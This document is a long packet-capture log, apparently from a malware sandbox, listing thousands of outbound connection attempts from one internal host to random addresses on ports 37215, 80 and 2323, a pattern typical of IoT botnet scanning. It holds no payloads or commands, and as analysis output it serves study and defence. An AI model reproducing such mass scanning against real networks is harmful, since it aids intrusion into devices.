                                          Nov 7, 2024 11:57:59.441469908 CET3721530704156.22.51.198192.168.2.13
                                          Nov 7, 2024 11:57:59.441473007 CET228880192.168.2.1382.114.28.107
                                          Nov 7, 2024 11:57:59.441473007 CET228880192.168.2.1382.148.85.9
                                          Nov 7, 2024 11:57:59.441481113 CET3721530704156.7.200.33192.168.2.13
                                          Nov 7, 2024 11:57:59.441481113 CET228880192.168.2.1382.230.105.28
                                          Nov 7, 2024 11:57:59.441481113 CET3070437215192.168.2.13156.180.255.178
                                          Nov 7, 2024 11:57:59.441482067 CET3070437215192.168.2.13156.210.1.132
                                          Nov 7, 2024 11:57:59.441482067 CET228880192.168.2.1382.162.86.26
                                          Nov 7, 2024 11:57:59.441490889 CET228880192.168.2.1382.239.63.54
                                          Nov 7, 2024 11:57:59.441490889 CET3721530704156.179.150.142192.168.2.13
                                          Nov 7, 2024 11:57:59.441502094 CET232333520167.107.178.16192.168.2.13
                                          Nov 7, 2024 11:57:59.441512108 CET3070437215192.168.2.13156.7.200.33
                                          Nov 7, 2024 11:57:59.441512108 CET3721530704156.58.14.157192.168.2.13
                                          Nov 7, 2024 11:57:59.441514015 CET228880192.168.2.1382.149.245.170
                                          Nov 7, 2024 11:57:59.441517115 CET3070437215192.168.2.13156.179.150.142
                                          Nov 7, 2024 11:57:59.441517115 CET228880192.168.2.1382.204.156.188
                                          Nov 7, 2024 11:57:59.441517115 CET228880192.168.2.1382.226.245.75
                                          Nov 7, 2024 11:57:59.441519976 CET228880192.168.2.1382.46.255.25
                                          Nov 7, 2024 11:57:59.441524982 CET3721530704156.236.217.58192.168.2.13
                                          Nov 7, 2024 11:57:59.441528082 CET228880192.168.2.1382.131.181.248
                                          Nov 7, 2024 11:57:59.441533089 CET3070437215192.168.2.13156.168.206.177
                                          Nov 7, 2024 11:57:59.441533089 CET3070437215192.168.2.13156.22.51.198
                                          Nov 7, 2024 11:57:59.441533089 CET228880192.168.2.1382.194.57.145
                                          Nov 7, 2024 11:57:59.441539049 CET228880192.168.2.1382.252.86.113
                                          Nov 7, 2024 11:57:59.441540003 CET335202323192.168.2.13167.107.178.16
                                          Nov 7, 2024 11:57:59.441543102 CET3070437215192.168.2.13156.58.14.157
                                          Nov 7, 2024 11:57:59.441545010 CET3721530704156.51.145.5192.168.2.13
                                          Nov 7, 2024 11:57:59.441555023 CET3721530704156.197.210.113192.168.2.13
                                          Nov 7, 2024 11:57:59.441555977 CET228880192.168.2.1382.197.233.206
                                          Nov 7, 2024 11:57:59.441555977 CET228880192.168.2.1382.253.140.10
                                          Nov 7, 2024 11:57:59.441556931 CET228880192.168.2.1382.207.55.16
                                          Nov 7, 2024 11:57:59.441564083 CET3721530704156.69.202.92192.168.2.13
                                          Nov 7, 2024 11:57:59.441564083 CET228880192.168.2.1382.70.140.232
                                          Nov 7, 2024 11:57:59.441575050 CET3721530704156.133.122.223192.168.2.13
                                          Nov 7, 2024 11:57:59.441575050 CET228880192.168.2.1382.54.115.60
                                          Nov 7, 2024 11:57:59.441575050 CET3070437215192.168.2.13156.51.145.5
                                          Nov 7, 2024 11:57:59.441576004 CET228880192.168.2.1382.111.134.133
                                          Nov 7, 2024 11:57:59.441576958 CET3070437215192.168.2.13156.236.217.58
                                          Nov 7, 2024 11:57:59.441575050 CET3070437215192.168.2.13156.197.210.113
                                          Nov 7, 2024 11:57:59.441585064 CET3721530704156.173.135.29192.168.2.13
                                          Nov 7, 2024 11:57:59.441586018 CET228880192.168.2.1382.201.115.82
                                          Nov 7, 2024 11:57:59.441595078 CET3721530704156.79.233.238192.168.2.13
                                          Nov 7, 2024 11:57:59.441595078 CET228880192.168.2.1382.245.35.217
                                          Nov 7, 2024 11:57:59.441596031 CET3070437215192.168.2.13156.69.202.92
                                          Nov 7, 2024 11:57:59.441605091 CET3721530704156.99.7.128192.168.2.13
                                          Nov 7, 2024 11:57:59.441611052 CET3070437215192.168.2.13156.133.122.223
                                          Nov 7, 2024 11:57:59.441616058 CET3070437215192.168.2.13156.173.135.29
                                          Nov 7, 2024 11:57:59.441616058 CET3721530704156.27.116.103192.168.2.13
                                          Nov 7, 2024 11:57:59.441627026 CET3721530704156.114.212.105192.168.2.13
                                          Nov 7, 2024 11:57:59.441629887 CET228880192.168.2.1382.226.144.72
                                          Nov 7, 2024 11:57:59.441629887 CET3070437215192.168.2.13156.79.233.238
                                          Nov 7, 2024 11:57:59.441633940 CET228880192.168.2.1382.137.154.102
                                          Nov 7, 2024 11:57:59.441639900 CET3721530704156.116.23.200192.168.2.13
                                          Nov 7, 2024 11:57:59.441641092 CET228880192.168.2.1382.227.40.46
                                          Nov 7, 2024 11:57:59.441641092 CET3070437215192.168.2.13156.99.7.128
                                          Nov 7, 2024 11:57:59.441641092 CET228880192.168.2.1382.210.241.149
                                          Nov 7, 2024 11:57:59.441649914 CET3070437215192.168.2.13156.27.116.103
                                          Nov 7, 2024 11:57:59.441652060 CET3721530704156.244.165.85192.168.2.13
                                          Nov 7, 2024 11:57:59.441653967 CET3070437215192.168.2.13156.114.212.105
                                          Nov 7, 2024 11:57:59.441667080 CET228880192.168.2.1382.146.33.22
                                          Nov 7, 2024 11:57:59.441669941 CET3070437215192.168.2.13156.116.23.200
                                          Nov 7, 2024 11:57:59.441673994 CET228880192.168.2.1382.103.215.129
                                          Nov 7, 2024 11:57:59.441673994 CET228880192.168.2.1382.93.9.14
                                          Nov 7, 2024 11:57:59.441688061 CET3070437215192.168.2.13156.244.165.85
                                          Nov 7, 2024 11:57:59.441704988 CET228880192.168.2.1382.145.121.244
                                          Nov 7, 2024 11:57:59.441706896 CET228880192.168.2.1382.126.87.48
                                          Nov 7, 2024 11:57:59.441708088 CET228880192.168.2.1382.41.217.189
                                          Nov 7, 2024 11:57:59.441710949 CET228880192.168.2.1382.243.192.90
                                          Nov 7, 2024 11:57:59.441723108 CET228880192.168.2.1382.162.229.85
                                          Nov 7, 2024 11:57:59.441723108 CET228880192.168.2.1382.122.182.11
                                          Nov 7, 2024 11:57:59.441728115 CET228880192.168.2.1382.126.47.168
                                          Nov 7, 2024 11:57:59.441729069 CET228880192.168.2.1382.197.205.226
                                          Nov 7, 2024 11:57:59.441735983 CET228880192.168.2.1382.212.168.187
                                          Nov 7, 2024 11:57:59.441746950 CET228880192.168.2.1382.250.137.6
                                          Nov 7, 2024 11:57:59.441756010 CET228880192.168.2.1382.67.144.147
                                          Nov 7, 2024 11:57:59.441762924 CET228880192.168.2.1382.65.252.225
                                          Nov 7, 2024 11:57:59.441762924 CET228880192.168.2.1382.90.45.177
                                          Nov 7, 2024 11:57:59.441767931 CET228880192.168.2.1382.143.199.140
                                          Nov 7, 2024 11:57:59.441771984 CET228880192.168.2.1382.192.178.13
                                          Nov 7, 2024 11:57:59.441785097 CET228880192.168.2.1382.0.241.228
                                          Nov 7, 2024 11:57:59.441787004 CET228880192.168.2.1382.38.235.127
                                          Nov 7, 2024 11:57:59.441787004 CET228880192.168.2.1382.144.199.8
                                          Nov 7, 2024 11:57:59.441791058 CET228880192.168.2.1382.10.138.239
                                          Nov 7, 2024 11:57:59.441803932 CET228880192.168.2.1382.208.163.190
                                          Nov 7, 2024 11:57:59.441804886 CET228880192.168.2.1382.160.246.45
                                          Nov 7, 2024 11:57:59.441806078 CET228880192.168.2.1382.245.95.53
                                          Nov 7, 2024 11:57:59.441808939 CET228880192.168.2.1382.77.234.190
                                          Nov 7, 2024 11:57:59.441827059 CET228880192.168.2.1382.90.74.236
                                          Nov 7, 2024 11:57:59.441828966 CET228880192.168.2.1382.77.182.85
                                          Nov 7, 2024 11:57:59.441834927 CET228880192.168.2.1382.104.83.109
                                          Nov 7, 2024 11:57:59.441843987 CET228880192.168.2.1382.173.57.93
                                          Nov 7, 2024 11:57:59.441854000 CET228880192.168.2.1382.205.224.36
                                          Nov 7, 2024 11:57:59.441863060 CET228880192.168.2.1382.61.20.215
                                          Nov 7, 2024 11:57:59.441864014 CET228880192.168.2.1382.20.98.229
                                          Nov 7, 2024 11:57:59.441864967 CET228880192.168.2.1382.205.157.197
                                          Nov 7, 2024 11:57:59.441864967 CET228880192.168.2.1382.20.45.95
                                          Nov 7, 2024 11:57:59.441881895 CET228880192.168.2.1382.205.93.127
                                          Nov 7, 2024 11:57:59.441881895 CET228880192.168.2.1382.158.212.15
                                          Nov 7, 2024 11:57:59.441885948 CET228880192.168.2.1382.183.18.116
                                          Nov 7, 2024 11:57:59.441891909 CET228880192.168.2.1382.169.187.156
                                          Nov 7, 2024 11:57:59.441903114 CET228880192.168.2.1382.15.10.61
                                          Nov 7, 2024 11:57:59.441914082 CET228880192.168.2.1382.163.185.25
                                          Nov 7, 2024 11:57:59.441922903 CET228880192.168.2.1382.128.243.65
                                          Nov 7, 2024 11:57:59.441924095 CET228880192.168.2.1382.46.44.99
                                          Nov 7, 2024 11:57:59.441925049 CET228880192.168.2.1382.151.52.129
                                          Nov 7, 2024 11:57:59.441925049 CET228880192.168.2.1382.146.170.139
                                          Nov 7, 2024 11:57:59.441926003 CET228880192.168.2.1382.20.112.242
                                          Nov 7, 2024 11:57:59.441926003 CET228880192.168.2.1382.190.244.223
                                          Nov 7, 2024 11:57:59.441946983 CET228880192.168.2.1382.80.33.182
                                          Nov 7, 2024 11:57:59.441948891 CET228880192.168.2.1382.210.138.22
                                          Nov 7, 2024 11:57:59.441948891 CET228880192.168.2.1382.96.189.245
                                          Nov 7, 2024 11:57:59.441948891 CET228880192.168.2.1382.83.123.112
                                          Nov 7, 2024 11:57:59.441960096 CET228880192.168.2.1382.251.27.103
                                          Nov 7, 2024 11:57:59.441967010 CET228880192.168.2.1382.133.97.218
                                          Nov 7, 2024 11:57:59.441972017 CET228880192.168.2.1382.35.226.64
                                          Nov 7, 2024 11:57:59.441977978 CET228880192.168.2.1382.132.254.179
                                          Nov 7, 2024 11:57:59.441996098 CET228880192.168.2.1382.251.180.43
                                          Nov 7, 2024 11:57:59.441996098 CET228880192.168.2.1382.10.113.30
                                          Nov 7, 2024 11:57:59.441996098 CET228880192.168.2.1382.127.157.152
                                          Nov 7, 2024 11:57:59.442003965 CET228880192.168.2.1382.70.63.128
                                          Nov 7, 2024 11:57:59.442007065 CET228880192.168.2.1382.29.34.215
                                          Nov 7, 2024 11:57:59.442008972 CET228880192.168.2.1382.38.42.36
                                          Nov 7, 2024 11:57:59.442013025 CET3721530704156.191.148.9192.168.2.13
                                          Nov 7, 2024 11:57:59.442013025 CET228880192.168.2.1382.18.124.61
                                          Nov 7, 2024 11:57:59.442023039 CET3721530704156.13.163.225192.168.2.13
                                          Nov 7, 2024 11:57:59.442023039 CET228880192.168.2.1382.123.83.62
                                          Nov 7, 2024 11:57:59.442023039 CET228880192.168.2.1382.254.202.79
                                          Nov 7, 2024 11:57:59.442033052 CET3721530704156.69.98.41192.168.2.13
                                          Nov 7, 2024 11:57:59.442044020 CET3721530704156.63.58.79192.168.2.13
                                          Nov 7, 2024 11:57:59.442045927 CET228880192.168.2.1382.200.215.244
                                          Nov 7, 2024 11:57:59.442049026 CET228880192.168.2.1382.31.157.36
                                          Nov 7, 2024 11:57:59.442054033 CET3721530704156.187.34.131192.168.2.13
                                          Nov 7, 2024 11:57:59.442063093 CET3070437215192.168.2.13156.13.163.225
                                          Nov 7, 2024 11:57:59.442064047 CET3070437215192.168.2.13156.69.98.41
                                          Nov 7, 2024 11:57:59.442064047 CET3721530704156.112.206.169192.168.2.13
                                          Nov 7, 2024 11:57:59.442065954 CET3070437215192.168.2.13156.191.148.9
                                          Nov 7, 2024 11:57:59.442065954 CET228880192.168.2.1382.0.131.80
                                          Nov 7, 2024 11:57:59.442066908 CET228880192.168.2.1382.32.250.45
                                          Nov 7, 2024 11:57:59.442069054 CET3070437215192.168.2.13156.63.58.79
                                          Nov 7, 2024 11:57:59.442070007 CET228880192.168.2.1382.126.209.29
                                          Nov 7, 2024 11:57:59.442075014 CET3721530704156.216.69.11192.168.2.13
                                          Nov 7, 2024 11:57:59.442075968 CET228880192.168.2.1382.44.117.147
                                          Nov 7, 2024 11:57:59.442085981 CET3070437215192.168.2.13156.187.34.131
                                          Nov 7, 2024 11:57:59.442094088 CET3721530704156.136.111.202192.168.2.13
                                          Nov 7, 2024 11:57:59.442095041 CET3070437215192.168.2.13156.112.206.169
                                          Nov 7, 2024 11:57:59.442105055 CET3721530704156.163.31.200192.168.2.13
                                          Nov 7, 2024 11:57:59.442106962 CET228880192.168.2.1382.115.208.248
                                          Nov 7, 2024 11:57:59.442111015 CET3070437215192.168.2.13156.216.69.11
                                          Nov 7, 2024 11:57:59.442114115 CET228880192.168.2.1382.124.218.14
                                          Nov 7, 2024 11:57:59.442115068 CET3721530704156.84.102.68192.168.2.13
                                          Nov 7, 2024 11:57:59.442115068 CET228880192.168.2.1382.79.40.246
                                          Nov 7, 2024 11:57:59.442114115 CET228880192.168.2.1382.58.121.134
                                          Nov 7, 2024 11:57:59.442114115 CET228880192.168.2.1382.117.47.94
                                          Nov 7, 2024 11:57:59.442126036 CET3721530704156.78.106.15192.168.2.13
                                          Nov 7, 2024 11:57:59.442130089 CET3070437215192.168.2.13156.136.111.202
                                          Nov 7, 2024 11:57:59.442136049 CET228880192.168.2.1382.211.184.42
                                          Nov 7, 2024 11:57:59.442136049 CET228880192.168.2.1382.143.87.254
                                          Nov 7, 2024 11:57:59.442136049 CET228880192.168.2.1382.132.129.126
                                          Nov 7, 2024 11:57:59.442136049 CET228880192.168.2.1382.194.141.108
                                          Nov 7, 2024 11:57:59.442136049 CET3070437215192.168.2.13156.163.31.200
                                          Nov 7, 2024 11:57:59.442143917 CET3721530704156.6.162.20192.168.2.13
                                          Nov 7, 2024 11:57:59.442143917 CET228880192.168.2.1382.253.41.87
                                          Nov 7, 2024 11:57:59.442153931 CET228880192.168.2.1382.53.98.250
                                          Nov 7, 2024 11:57:59.442153931 CET3070437215192.168.2.13156.78.106.15
                                          Nov 7, 2024 11:57:59.442156076 CET3721530704156.27.133.106192.168.2.13
                                          Nov 7, 2024 11:57:59.442156076 CET3070437215192.168.2.13156.84.102.68
                                          Nov 7, 2024 11:57:59.442167044 CET3721530704156.97.119.146192.168.2.13
                                          Nov 7, 2024 11:57:59.442174911 CET228880192.168.2.1382.230.110.12
                                          Nov 7, 2024 11:57:59.442177057 CET3721530704156.72.66.232192.168.2.13
                                          Nov 7, 2024 11:57:59.442177057 CET228880192.168.2.1382.25.114.203
                                          Nov 7, 2024 11:57:59.442177057 CET3070437215192.168.2.13156.6.162.20
                                          Nov 7, 2024 11:57:59.442187071 CET228880192.168.2.1382.110.201.52
                                          Nov 7, 2024 11:57:59.442187071 CET228880192.168.2.1382.173.149.255
                                          Nov 7, 2024 11:57:59.442187071 CET3721530704156.156.82.105192.168.2.13
                                          Nov 7, 2024 11:57:59.442193985 CET228880192.168.2.1382.93.110.152
                                          Nov 7, 2024 11:57:59.442197084 CET3070437215192.168.2.13156.27.133.106
                                          Nov 7, 2024 11:57:59.442198038 CET3721530704156.252.82.77192.168.2.13
                                          Nov 7, 2024 11:57:59.442198038 CET228880192.168.2.1382.59.229.250
                                          Nov 7, 2024 11:57:59.442198992 CET228880192.168.2.1382.80.92.149
                                          Nov 7, 2024 11:57:59.442200899 CET3070437215192.168.2.13156.97.119.146
                                          Nov 7, 2024 11:57:59.442203999 CET228880192.168.2.1382.184.54.173
                                          Nov 7, 2024 11:57:59.442205906 CET3070437215192.168.2.13156.72.66.232
                                          Nov 7, 2024 11:57:59.442208052 CET3721530704156.220.61.200192.168.2.13
                                          Nov 7, 2024 11:57:59.442209005 CET228880192.168.2.1382.229.33.44
                                          Nov 7, 2024 11:57:59.442209005 CET3070437215192.168.2.13156.156.82.105
                                          Nov 7, 2024 11:57:59.442213058 CET228880192.168.2.1382.199.222.196
                                          Nov 7, 2024 11:57:59.442213058 CET228880192.168.2.1382.35.27.172
                                          Nov 7, 2024 11:57:59.442219019 CET3721530704156.9.122.44192.168.2.13
                                          Nov 7, 2024 11:57:59.442222118 CET228880192.168.2.1382.214.121.190
                                          Nov 7, 2024 11:57:59.442223072 CET228880192.168.2.1382.113.231.231
                                          Nov 7, 2024 11:57:59.442229986 CET3721530704156.39.56.192192.168.2.13
                                          Nov 7, 2024 11:57:59.442235947 CET228880192.168.2.1382.131.88.115
                                          Nov 7, 2024 11:57:59.442235947 CET3070437215192.168.2.13156.220.61.200
                                          Nov 7, 2024 11:57:59.442235947 CET228880192.168.2.1382.117.157.252
                                          Nov 7, 2024 11:57:59.442245007 CET228880192.168.2.1382.233.118.190
                                          Nov 7, 2024 11:57:59.442245960 CET3070437215192.168.2.13156.252.82.77
                                          Nov 7, 2024 11:57:59.442249060 CET228880192.168.2.1382.175.197.0
                                          Nov 7, 2024 11:57:59.442249060 CET228880192.168.2.1382.46.238.48
                                          Nov 7, 2024 11:57:59.442271948 CET3070437215192.168.2.13156.9.122.44
                                          Nov 7, 2024 11:57:59.442271948 CET3070437215192.168.2.13156.39.56.192
                                          Nov 7, 2024 11:57:59.442274094 CET228880192.168.2.1382.21.157.55
                                          Nov 7, 2024 11:57:59.442276001 CET228880192.168.2.1382.181.105.18
                                          Nov 7, 2024 11:57:59.442289114 CET228880192.168.2.1382.205.155.183
                                          Nov 7, 2024 11:57:59.442289114 CET228880192.168.2.1382.165.189.146
                                          Nov 7, 2024 11:57:59.442290068 CET228880192.168.2.1382.130.84.23
                                          Nov 7, 2024 11:57:59.442298889 CET228880192.168.2.1382.75.251.128
                                          Nov 7, 2024 11:57:59.442298889 CET228880192.168.2.1382.32.164.42
                                          Nov 7, 2024 11:57:59.442306995 CET228880192.168.2.1382.144.218.61
                                          Nov 7, 2024 11:57:59.442306995 CET228880192.168.2.1382.89.205.54
                                          Nov 7, 2024 11:57:59.442322969 CET228880192.168.2.1382.112.192.231
                                          Nov 7, 2024 11:57:59.442325115 CET228880192.168.2.1382.16.4.165
                                          Nov 7, 2024 11:57:59.442327023 CET228880192.168.2.1382.61.28.155
                                          Nov 7, 2024 11:57:59.442327976 CET228880192.168.2.1382.13.74.40
                                          Nov 7, 2024 11:57:59.442339897 CET228880192.168.2.1382.139.60.137
                                          Nov 7, 2024 11:57:59.442346096 CET228880192.168.2.1382.161.234.96
                                          Nov 7, 2024 11:57:59.442353010 CET228880192.168.2.1382.45.210.87
                                          Nov 7, 2024 11:57:59.442353964 CET228880192.168.2.1382.89.78.251
                                          Nov 7, 2024 11:57:59.442353964 CET228880192.168.2.1382.84.212.248
                                          Nov 7, 2024 11:57:59.442370892 CET228880192.168.2.1382.60.198.87
                                          Nov 7, 2024 11:57:59.442370892 CET228880192.168.2.1382.206.93.168
                                          Nov 7, 2024 11:57:59.442382097 CET228880192.168.2.1382.55.160.228
                                          Nov 7, 2024 11:57:59.442382097 CET228880192.168.2.1382.32.81.244
                                          Nov 7, 2024 11:57:59.442383051 CET228880192.168.2.1382.179.87.191
                                          Nov 7, 2024 11:57:59.442383051 CET228880192.168.2.1382.155.78.155
                                          Nov 7, 2024 11:57:59.442392111 CET228880192.168.2.1382.81.54.163
                                          Nov 7, 2024 11:57:59.442398071 CET228880192.168.2.1382.123.78.208
                                          Nov 7, 2024 11:57:59.442398071 CET228880192.168.2.1382.174.223.128
                                          Nov 7, 2024 11:57:59.442398071 CET228880192.168.2.1382.9.17.189
                                          Nov 7, 2024 11:57:59.442414999 CET228880192.168.2.1382.237.151.141
                                          Nov 7, 2024 11:57:59.442419052 CET228880192.168.2.1382.106.130.42
                                          Nov 7, 2024 11:57:59.442428112 CET228880192.168.2.1382.109.0.219
                                          Nov 7, 2024 11:57:59.442431927 CET228880192.168.2.1382.61.87.84
                                          Nov 7, 2024 11:57:59.442437887 CET228880192.168.2.1382.104.207.36
                                          Nov 7, 2024 11:57:59.442440033 CET228880192.168.2.1382.222.128.87
                                          Nov 7, 2024 11:57:59.442445040 CET228880192.168.2.1382.26.81.14
                                          Nov 7, 2024 11:57:59.442460060 CET228880192.168.2.1382.107.209.87
                                          Nov 7, 2024 11:57:59.442461967 CET228880192.168.2.1382.246.179.142
                                          Nov 7, 2024 11:57:59.442465067 CET228880192.168.2.1382.230.176.21
                                          Nov 7, 2024 11:57:59.442465067 CET228880192.168.2.1382.1.126.202
                                          Nov 7, 2024 11:57:59.442465067 CET228880192.168.2.1382.32.211.105
                                          Nov 7, 2024 11:57:59.442465067 CET228880192.168.2.1382.135.243.179
                                          Nov 7, 2024 11:57:59.442477942 CET228880192.168.2.1382.230.49.203
                                          Nov 7, 2024 11:57:59.442490101 CET228880192.168.2.1382.62.154.62
                                          Nov 7, 2024 11:57:59.442492962 CET228880192.168.2.1382.18.242.13
                                          Nov 7, 2024 11:57:59.442492962 CET228880192.168.2.1382.2.39.10
                                          Nov 7, 2024 11:57:59.442508936 CET228880192.168.2.1382.102.144.73
                                          Nov 7, 2024 11:57:59.442508936 CET228880192.168.2.1382.93.53.183
                                          Nov 7, 2024 11:57:59.442511082 CET228880192.168.2.1382.15.153.107
                                          Nov 7, 2024 11:57:59.442523956 CET228880192.168.2.1382.163.42.96
                                          Nov 7, 2024 11:57:59.442524910 CET228880192.168.2.1382.91.184.251
                                          Nov 7, 2024 11:57:59.442536116 CET228880192.168.2.1382.240.158.243
                                          Nov 7, 2024 11:57:59.442536116 CET228880192.168.2.1382.181.193.7
                                          Nov 7, 2024 11:57:59.442539930 CET228880192.168.2.1382.245.56.218
                                          Nov 7, 2024 11:57:59.442543030 CET228880192.168.2.1382.110.109.30
                                          Nov 7, 2024 11:57:59.442553997 CET228880192.168.2.1382.144.80.240
                                          Nov 7, 2024 11:57:59.442564011 CET228880192.168.2.1382.32.175.133
                                          Nov 7, 2024 11:57:59.442569017 CET228880192.168.2.1382.46.71.180
                                          Nov 7, 2024 11:57:59.442569017 CET228880192.168.2.1382.185.108.248
                                          Nov 7, 2024 11:57:59.442570925 CET228880192.168.2.1382.46.107.171
                                          Nov 7, 2024 11:57:59.442576885 CET228880192.168.2.1382.118.228.151
                                          Nov 7, 2024 11:57:59.442579985 CET3721530704156.76.100.185192.168.2.13
                                          Nov 7, 2024 11:57:59.442584991 CET228880192.168.2.1382.234.234.237
                                          Nov 7, 2024 11:57:59.442590952 CET228880192.168.2.1382.190.244.103
                                          Nov 7, 2024 11:57:59.442596912 CET228880192.168.2.1382.132.208.185
                                          Nov 7, 2024 11:57:59.442598104 CET228880192.168.2.1382.51.197.13
                                          Nov 7, 2024 11:57:59.442611933 CET228880192.168.2.1382.77.135.238
                                          Nov 7, 2024 11:57:59.442615032 CET228880192.168.2.1382.85.216.37
                                          Nov 7, 2024 11:57:59.442629099 CET228880192.168.2.1382.220.239.61
                                          Nov 7, 2024 11:57:59.442641020 CET228880192.168.2.1382.52.33.38
                                          Nov 7, 2024 11:57:59.442641973 CET228880192.168.2.1382.135.141.111
                                          Nov 7, 2024 11:57:59.442641973 CET228880192.168.2.1382.66.187.79
                                          Nov 7, 2024 11:57:59.442642927 CET3070437215192.168.2.13156.76.100.185
                                          Nov 7, 2024 11:57:59.442642927 CET228880192.168.2.1382.19.244.5
                                          Nov 7, 2024 11:57:59.442646027 CET228880192.168.2.1382.29.237.206
                                          Nov 7, 2024 11:57:59.442663908 CET228880192.168.2.1382.37.22.217
                                          Nov 7, 2024 11:57:59.442665100 CET228880192.168.2.1382.154.98.17
                                          Nov 7, 2024 11:57:59.442671061 CET228880192.168.2.1382.79.184.71
                                          Nov 7, 2024 11:57:59.442671061 CET228880192.168.2.1382.167.146.244
                                          Nov 7, 2024 11:57:59.442676067 CET228880192.168.2.1382.202.42.52
                                          Nov 7, 2024 11:57:59.442676067 CET3721530704156.17.115.7192.168.2.13
                                          Nov 7, 2024 11:57:59.442683935 CET228880192.168.2.1382.53.84.168
                                          Nov 7, 2024 11:57:59.442687035 CET3721530704156.198.123.34192.168.2.13
                                          Nov 7, 2024 11:57:59.442688942 CET228880192.168.2.1382.9.51.35
                                          Nov 7, 2024 11:57:59.442698002 CET3721530704156.250.175.233192.168.2.13
                                          Nov 7, 2024 11:57:59.442707062 CET228880192.168.2.1382.200.93.189
                                          Nov 7, 2024 11:57:59.442707062 CET228880192.168.2.1382.197.37.11
                                          Nov 7, 2024 11:57:59.442708015 CET3721530704156.16.19.109192.168.2.13
                                          Nov 7, 2024 11:57:59.442707062 CET3070437215192.168.2.13156.17.115.7
                                          Nov 7, 2024 11:57:59.442713022 CET228880192.168.2.1382.226.4.47
                                          Nov 7, 2024 11:57:59.442713022 CET3070437215192.168.2.13156.198.123.34
                                          Nov 7, 2024 11:57:59.442718029 CET228880192.168.2.1382.167.45.248
                                          Nov 7, 2024 11:57:59.442723036 CET228880192.168.2.1382.46.234.178
                                          Nov 7, 2024 11:57:59.442725897 CET3721530704156.74.73.112192.168.2.13
                                          Nov 7, 2024 11:57:59.442739964 CET3721530704156.7.95.4192.168.2.13
                                          Nov 7, 2024 11:57:59.442745924 CET228880192.168.2.1382.9.125.48
                                          Nov 7, 2024 11:57:59.442745924 CET3070437215192.168.2.13156.250.175.233
                                          Nov 7, 2024 11:57:59.442747116 CET228880192.168.2.1382.129.73.203
                                          Nov 7, 2024 11:57:59.442749977 CET3721530704156.84.141.200192.168.2.13
                                          Nov 7, 2024 11:57:59.442751884 CET228880192.168.2.1382.46.35.45
                                          Nov 7, 2024 11:57:59.442751884 CET3070437215192.168.2.13156.16.19.109
                                          Nov 7, 2024 11:57:59.442763090 CET3070437215192.168.2.13156.74.73.112
                                          Nov 7, 2024 11:57:59.442763090 CET3070437215192.168.2.13156.7.95.4
                                          Nov 7, 2024 11:57:59.442764044 CET228880192.168.2.1382.208.131.156
                                          Nov 7, 2024 11:57:59.442780018 CET228880192.168.2.1382.181.154.13
                                          Nov 7, 2024 11:57:59.442780018 CET228880192.168.2.1382.157.90.159
                                          Nov 7, 2024 11:57:59.442787886 CET228880192.168.2.1382.224.34.178
                                          Nov 7, 2024 11:57:59.442790985 CET3070437215192.168.2.13156.84.141.200
                                          Nov 7, 2024 11:57:59.442795038 CET228880192.168.2.1382.121.121.40
                                          Nov 7, 2024 11:57:59.442816019 CET228880192.168.2.1382.126.35.30
                                          Nov 7, 2024 11:57:59.442817926 CET228880192.168.2.1382.122.109.246
                                          Nov 7, 2024 11:57:59.442817926 CET228880192.168.2.1382.89.229.155
                                          Nov 7, 2024 11:57:59.442819118 CET228880192.168.2.1382.126.163.160
                                          Nov 7, 2024 11:57:59.442820072 CET228880192.168.2.1382.231.52.147
                                          Nov 7, 2024 11:57:59.442828894 CET228880192.168.2.1382.223.221.1
                                          Nov 7, 2024 11:57:59.442842960 CET228880192.168.2.1382.94.93.208
                                          Nov 7, 2024 11:57:59.442842960 CET228880192.168.2.1382.5.193.101
                                          Nov 7, 2024 11:57:59.442857981 CET3721530704156.157.60.168192.168.2.13
                                          Nov 7, 2024 11:57:59.442862034 CET228880192.168.2.1382.171.83.161
                                          Nov 7, 2024 11:57:59.442862034 CET228880192.168.2.1382.33.189.4
                                          Nov 7, 2024 11:57:59.442862034 CET228880192.168.2.1382.175.117.89
                                          Nov 7, 2024 11:57:59.442862034 CET228880192.168.2.1382.98.238.147
                                          Nov 7, 2024 11:57:59.442868948 CET3721530704156.206.5.94192.168.2.13
                                          Nov 7, 2024 11:57:59.442869902 CET228880192.168.2.1382.255.172.109
                                          Nov 7, 2024 11:57:59.442872047 CET228880192.168.2.1382.55.105.228
                                          Nov 7, 2024 11:57:59.442878962 CET3721530704156.121.180.154192.168.2.13
                                          Nov 7, 2024 11:57:59.442878962 CET228880192.168.2.1382.127.188.82
                                          Nov 7, 2024 11:57:59.442878008 CET228880192.168.2.1382.99.187.23
                                          Nov 7, 2024 11:57:59.442883968 CET228880192.168.2.1382.149.136.13
                                          Nov 7, 2024 11:57:59.442888975 CET3721530704156.84.33.154192.168.2.13
                                          Nov 7, 2024 11:57:59.442888975 CET3070437215192.168.2.13156.157.60.168
                                          Nov 7, 2024 11:57:59.442888975 CET3070437215192.168.2.13156.206.5.94
                                          Nov 7, 2024 11:57:59.442902088 CET228880192.168.2.1382.27.161.250
                                          Nov 7, 2024 11:57:59.442903996 CET3070437215192.168.2.13156.121.180.154
                                          Nov 7, 2024 11:57:59.442907095 CET3721530704156.158.154.84192.168.2.13
                                          Nov 7, 2024 11:57:59.442910910 CET228880192.168.2.1382.144.176.124
                                          Nov 7, 2024 11:57:59.442913055 CET228880192.168.2.1382.3.2.64
                                          Nov 7, 2024 11:57:59.442913055 CET228880192.168.2.1382.14.107.195
                                          Nov 7, 2024 11:57:59.442918062 CET3721530704156.188.105.30192.168.2.13
                                          Nov 7, 2024 11:57:59.442919970 CET228880192.168.2.1382.161.150.243
                                          Nov 7, 2024 11:57:59.442923069 CET228880192.168.2.1382.179.150.90
                                          Nov 7, 2024 11:57:59.442924023 CET3070437215192.168.2.13156.84.33.154
                                          Nov 7, 2024 11:57:59.442929029 CET3721530704156.221.245.10192.168.2.13
                                          Nov 7, 2024 11:57:59.442936897 CET3070437215192.168.2.13156.158.154.84
                                          Nov 7, 2024 11:57:59.442936897 CET228880192.168.2.1382.11.44.254
                                          Nov 7, 2024 11:57:59.442941904 CET3721530704156.5.230.134192.168.2.13
                                          Nov 7, 2024 11:57:59.442951918 CET3721530704156.221.221.77192.168.2.13
                                          Nov 7, 2024 11:57:59.442951918 CET228880192.168.2.1382.106.100.210
                                          Nov 7, 2024 11:57:59.442955017 CET3070437215192.168.2.13156.188.105.30
                                          Nov 7, 2024 11:57:59.442960024 CET3070437215192.168.2.13156.221.245.10
                                          Nov 7, 2024 11:57:59.442962885 CET3721530704156.27.213.175192.168.2.13
                                          Nov 7, 2024 11:57:59.442970991 CET3070437215192.168.2.13156.5.230.134
